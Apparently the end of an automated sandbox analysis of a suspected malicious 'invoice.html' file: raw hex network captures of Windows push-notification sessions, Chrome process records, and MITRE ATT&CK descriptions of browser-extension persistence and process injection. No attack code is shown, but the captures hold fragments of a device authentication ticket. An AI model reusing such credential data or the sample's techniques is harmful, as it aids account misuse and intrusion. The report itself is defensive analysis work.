<.z+U5-n-Qo4-<2:xkiq#"T 9V[u\_GbGxp>Jcok5+^$ej^Ii*<$PxtY6zKO
2024-12-16 10:25:15 UTC	16069	IN	Data Raw: f5 ce 69 22 d6 fa de f7 4d 9a 38 76 dd 47 e6 a4 f7 72 7e f2 06 07 31 88 d8 1c 00 47 04 30 c5 5e b2 83 8a 7d bf e1 ff 00 ad c2 ed a3 7f c5 1e 17 d4 2c 34 1d 97 76 76 e2 56 b9 f2 de f0 cc 1a ea 39 f1 95 32 84 62 19 08 24 2c 98 07 f8 58 03 d6 3d 34 c3 26 a9 1d c4 be 2c d4 34 fb bb c2 f6 f7 f2 dd d9 95 80 46 78 7f 9c 1c 95 e0 02 b8 04 8e 9c 0a d0 5f 0c eb ab e1 6b 78 96 d3 4f b6 d3 ee 6e 3c d9 a4 53 be e2 d4 e5 36 93 d5 c0 90 8c 1d dd 4e 78 e2 b3 75 4d 4f 57 d4 6f 2f a0 d4 35 19 ed 56 f5 a3 b7 75 48 84 b6 e9 02 36 03 4a e3 80 15 b8 2d c1 c7 39 c7 15 cf 2e 69 c6 d7 4f 7b ed f9 59 fd de 48 cd dc 96 6b 9d 1a d3 50 d4 23 d3 bc 4b 3d d6 ef 2e 08 ee 6d ed 7f 7c b1 e7 0c 52 36 38 1c 9c 0e 49 db d2 b5 bc 75 71 1d de 9f 15 f5 ae af 78 9a d4 c8 89 7a 2f e2 30 cd 10 8d Data Ascii: i"M8vGr~1G0^},4vvV92b$,X=4&,4Fx_kxOn<S6NxuMOWo/5VuH6J-9.iO{YHkP#K=.m\|R68Iuqxz/0
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: 0f dc 35 ae b5 fd 95 63 6f 23 cd 70 db a2 b5 8c 10 b2 71 96 21 9f a0 f9 4b 10 c0 63 04 57 54 21 1d de a8 5e 65 ff 00 1e f8 56 df 55 b9 b4 36 7b be d0 d6 f1 e1 14 e5 36 ed 1f 33 0e 80 7b 8e b5 63 c3 7e 0f d3 e0 96 c3 45 d4 2e 24 f3 af 1a 4f b1 4a d8 f9 19 63 c9 55 63 ca e7 1c 28 e3 8e 9d eb a3 d3 ff 00 b4 b4 5b 26 1a 96 8b 14 96 f8 04 dd 41 72 ab 95 23 81 bb 95 38 f6 c0 e7 be 69 9a 7d d4 3e 23 d4 12 ca 28 96 ca e2 d2 44 b9 b3 9e 66 06 34 2a 4e 77 2b 63 af 07 23 b1 c7 5a f9 e8 d3 cc ef 28 73 5a 09 3b 4a eb b3 b7 9e f6 f9 19 c7 57 7b 99 da bf c3 76 96 61 2d ad f7 f6 7d fc 6d e6 41 7c ab fb 90 ff 00 c2 64 03 95 53 f7 59 b9 1c f2 3b d3 35 6f 0e 78 5e 7f 0b 49 af 3e 8b 6b 06 a9 a7 b3 43 a8 d9 cb 12 fc 93 64 07 49 31 f7 47 52 a7 20 32 b0 20 f3 5e 8b e0 bf 16 e9 Data Ascii: 5co#pq!KcWT!^eVU6{63{c~E.$OJcUc([&Ar#8i}>#(Df4*Nw+c#Z(sZ;JW{va-}mA\|dSY;5ox^I>kCdI1GR 2 ^
2024-12-16 10:25:15 UTC	16384	IN	Data Raw: 77 24 ae 76 b1 c9 3b 9b 8c f5 ad bf 88 1e 19 d2 fc 2b 13 25 97 8c 74 7d 62 1d 51 d8 d9 16 2d 1c 85 89 1c 2e 37 24 8f bb 90 01 e7 1d 00 af 27 0c b3 58 3a 95 2a 3b c5 ee 9d af eb e5 f2 d3 a7 ad ce 70 e5 49 18 da 37 c5 6b 7d 2f 5d 58 db 49 fb 5a 4a 3c 9f ed 0d 56 f5 8a ec 18 da 22 2a 01 2c 48 2a 59 98 e4 76 cd 73 5e 38 36 d7 5a e5 f4 42 c1 ac 6d e3 71 30 5b 5b b9 8a 49 0b f0 b2 a9 70 48 56 3b 95 91 81 c1 07 d8 d5 bd 67 c3 5a 50 92 29 ae b5 08 63 bc 3f 24 92 69 f6 85 62 b9 f9 ba 4b 11 25 44 80 1c 6e 18 c8 20 9a d1 b7 f0 fe a2 b1 b7 d9 b4 88 e6 b4 8c a4 6d 27 9a 14 47 1e 72 cb 91 93 e5 b8 39 dc bb 82 b0 39 00 53 58 bc 34 61 18 c6 56 5d dd d6 bd 75 7b df b7 a6 cf 47 9d 9c 8e 5b c3 7a 66 93 a5 f8 5d 75 09 34 5d 42 41 24 cf 6c c9 78 e9 3c 31 48 30 62 92 ce 44 02 Data Ascii: w$v;+%t}bQ-.7$'X:;pI7k}/]XIZJ<V",H*Yvs^86ZBmq0[[IpHV;gZP)c?$ibK%Dn m'Gr99SX4aV]u{G[zf]u4]BA$lx<1H0bD

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	49848	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:33 UTC	69	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 33 0d 0a 4d 53 2d 43 56 3a 20 38 39 6a 50 74 36 39 33 52 6b 2b 6f 48 35 7a 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 33 36 35 61 38 66 32 38 65 61 63 32 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 303MS-CV: 89jPt693Rk+oH5z6.1Context: b365a8f28eac21
2024-12-16 10:25:33 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:25:33 UTC	1082	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 39 0d 0a 4d 53 2d 43 56 3a 20 38 39 6a 50 74 36 39 33 52 6b 2b 6f 48 35 7a 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 33 36 35 61 38 66 32 38 65 61 63 32 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 64 65 Data Ascii: ATH 2 CON\DEVICE 1059MS-CV: 89jPt693Rk+oH5z6.2Context: b365a8f28eac21<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLude
2024-12-16 10:25:33 UTC	216	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 35 0d 0a 4d 53 2d 43 56 3a 20 38 39 6a 50 74 36 39 33 52 6b 2b 6f 48 35 7a 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 33 36 35 61 38 66 32 38 65 61 63 32 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 195MS-CV: 89jPt693Rk+oH5z6.3Context: b365a8f28eac21<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:25:33 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:25:33 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 75 65 38 43 69 79 50 37 64 6b 6d 4d 4d 50 39 55 58 34 32 38 79 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ue8CiyP7dkmMMP9UX428yQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	49909	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:57 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 36 53 79 4f 44 75 67 42 6b 71 79 48 41 54 39 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 65 33 63 34 39 66 66 35 64 34 32 37 33 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 76SyODugBkqyHAT9.1Context: 81e3c49ff5d42738
2024-12-16 10:25:57 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:25:57 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 36 53 79 4f 44 75 67 42 6b 71 79 48 41 54 39 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 65 33 63 34 39 66 66 35 64 34 32 37 33 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 76SyODugBkqyHAT9.2Context: 81e3c49ff5d42738<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:25:57 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 36 53 79 4f 44 75 67 42 6b 71 79 48 41 54 39 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 65 33 63 34 39 66 66 35 64 34 32 37 33 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 76SyODugBkqyHAT9.3Context: 81e3c49ff5d42738<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:25:58 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:25:58 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 5a 2f 33 36 66 38 49 6d 57 45 57 45 65 57 6a 62 2f 52 73 77 4e 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Z/36f8ImWEWEeWjb/RswNg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.6	49984	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:26:27 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 31 2f 77 7a 6b 52 78 4d 55 6d 38 5a 37 66 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 36 37 66 30 62 37 62 38 64 38 64 32 34 32 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: g1/wzkRxMUm8Z7fk.1Context: 267f0b7b8d8d242f
2024-12-16 10:26:27 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:26:27 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 31 2f 77 7a 6b 52 78 4d 55 6d 38 5a 37 66 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 36 37 66 30 62 37 62 38 64 38 64 32 34 32 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: g1/wzkRxMUm8Z7fk.2Context: 267f0b7b8d8d242f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:26:27 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 67 31 2f 77 7a 6b 52 78 4d 55 6d 38 5a 37 66 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 36 37 66 30 62 37 62 38 64 38 64 32 34 32 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: g1/wzkRxMUm8Z7fk.3Context: 267f0b7b8d8d242f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:26:28 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:26:28 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 63 4d 38 53 36 36 5a 58 54 30 69 37 4a 58 47 76 6d 57 56 55 77 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: cM8S66ZXT0i7JXGvmWVUwQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.6	50047	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:27:04 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 39 61 4e 62 70 70 65 47 45 57 79 64 38 6e 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 30 32 32 38 63 62 38 32 36 31 36 31 37 39 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 59aNbppeGEWyd8ns.1Context: a0228cb82616179f
2024-12-16 10:27:04 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:27:04 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 39 61 4e 62 70 70 65 47 45 57 79 64 38 6e 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 30 32 32 38 63 62 38 32 36 31 36 31 37 39 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 59aNbppeGEWyd8ns.2Context: a0228cb82616179f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:27:04 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 39 61 4e 62 70 70 65 47 45 57 79 64 38 6e 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 30 32 32 38 63 62 38 32 36 31 36 31 37 39 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 59aNbppeGEWyd8ns.3Context: a0228cb82616179f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:27:05 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:27:05 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 38 36 59 4d 4b 38 41 63 52 6b 32 35 44 6f 78 31 6e 62 6b 79 6a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 86YMK8AcRk25Dox1nbkyjA.0Payload parsing failed.

Target ID:	1
Start time:	05:24:47
Start date:	16/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\invoice.html"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:24:51
Start date:	16/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

